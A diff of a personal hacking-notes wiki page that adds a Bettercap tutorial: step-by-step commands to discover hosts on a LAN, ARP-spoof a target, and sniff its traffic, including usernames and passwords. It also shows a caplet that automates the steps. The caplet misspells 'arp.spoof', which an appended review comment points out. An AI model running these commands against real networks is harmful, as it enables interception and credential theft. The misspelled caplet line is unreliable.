The gMan nixWiki

Because the mind is made of Teflon...

hack_postconnect_arpspoofing

Differences

This shows you the differences between two versions of the page.

hack_postconnect_arpspoofing [2020/05/31 17:58] – [arpspoof] gman
hack_postconnect_arpspoofing [2020/05/31 18:11] (current) – [Bettercap ARP Spoof] gman
Line 57: Line 57:
  
 NOTE: You need to enable port forwarding to allow packets to flow through your machine just like a router. NOTE: You need to enable port forwarding to allow packets to flow through your machine just like a router.
-  * As root: ``echo 1 > /proc/sys/net/ipv4/ip_forward``+  * As root: ''echo 1 > /proc/sys/net/ipv4/ip_forward''
  
 +----
 +
 +===== Bettercap =====
 +
 +Bettercap can do the same thing as arpspoof and more: [[https://www.bettercap.org/modules/ethernet/|docs]].
 +
 +Bettercap is a framework to run network attacks: 
 +  * ARP Spoofing (redirect flow of packets through your machine to analyze, change)
 +  * Sniff data (urls, usernames, passwords)
 +  * Bypass HTTPS
 +  * DNS Spoofing (redirect domain requests)
 +  * Inject code in loaded pages
 +
 +**Syntax:** ''bettercap -iface [interface]''
 +
 +That gets in you into the tool. Type ''help'' to see a menu and the ''help [moduleName]'' to get help on a specific module name you want to use.
 +  * At the top of the help information you get syntax to turn on/off, etc.
 +  * Under that you get Parameters (options for the module). To change: 
 +    * Syntax: ''set [option to modify] [true | false]''
 +    * Example: ''set arp.spoof.fullduplex true''
 +
 +**Module: net.probe** (discover connected clients quickly)
 +  * Turn the module on (at bettercap prompt): ''net.probe on''
 +  * This will also automatically start the net.recon module (type "help" at prompt to confirm)
 +
 +**Module: net.recon**
 +  * net.probe sends probe requests to all possible IPs on the network
 +  * net.recon monitors ARP cache to take the responses and add them to a list for me to target
 +  * net.recon has several commands: 
 +    * net.show: Show cache hosts list (default sorting by ip).
 +
 +----
 +
 +===== Bettercap ARP Spoof =====
 +
 +Module: arp.spoof (for use, at bettercap prompt: "help arp.spoof")
 +  * You MUST have net.probe and net.recon running for this to work.
 +
 +1. Turn on net.probe if it's not on already
 +
 +<code>net.probe on</code>
 +
 +2. Change module parameter for full duplex (spoof client and router, both):
 +
 +<code>set arp.spoof.fullduplex true</code>
 +
 +3. Change module parameter to add your target client IP (because we set the full-duplex parameter, we do not have to set the gateway, only the client; the gateway/router sets automagically): 
 +
 +<code>
 +set arp.spoof.targets [target IP]
 +# or
 +set arp.spoof.targets [target IP],[target IP],[target IP]
 +</code>
 +
 +4. Turn ARP spoofing on (see "help arp.spoof") and that's it.
 +
 +<code>
 +arp.spoof on
 +help #to see the modules running
 +</code>
 +
 +NOTE: If you check our arp table in the client you will see the attach machine's MAC associated with the gateway.
 +
 +5. To sniff the traffic (still using bettercap; later we'll use Wireshark):
 +
 +<code>
 +help net.sniff # see the options
 +net.sniff on
 +</code>
 +
 +**Test It:** [[http://testphp.vulnweb.com/|VulnWeb]] (to generate some traffic)
 +
 +----
 +
 +===== Bettercap Caplets =====
 +
 +Caplets are custom scripts for Bettercap (basically text files with commands, one on each line). 
 +
 +How-To:
 +  - Create a text file
 +  - On each line put the commands you always run: 
 +
 +Example (to do all the above when you start Bettercap): 
 +
 +<code>
 +net.probe on
 +set arp.spoof.fullduplex true
 +set arp.spoof.targets 10.0.0.142
 +arp.spooof on
 +net.sniff on
 +</code>
 +
 +To run it: 
 +
 +<code>bettercap -iface [interface name] -caplet /path/to/caplet.cap</code>
 +
 +----
  
  
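Review bot: the caplet example in the "Bettercap Caplets" section misspells the module name, ''arp.spooof on'', so that line will fail when the caplet is loaded and spoofing will never be turned on; it should read ''arp.spoof on'', matching step 4 of the "Bettercap ARP Spoof" section above. Two wording points in the same hunk: the context line says "enable port forwarding", but ''echo 1 > /proc/sys/net/ipv4/ip_forward'' enables IP forwarding (the kernel routing packets through the host, as the same sentence describes), so it should say IP forwarding; and the note after step 4 should read "the attacking machine's MAC", not "the attach machine's MAC", and "That gets in you into the tool" should be "That gets you into the tool".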
hack_postconnect_arpspoofing.1590947910.txt.gz · Last modified: by gman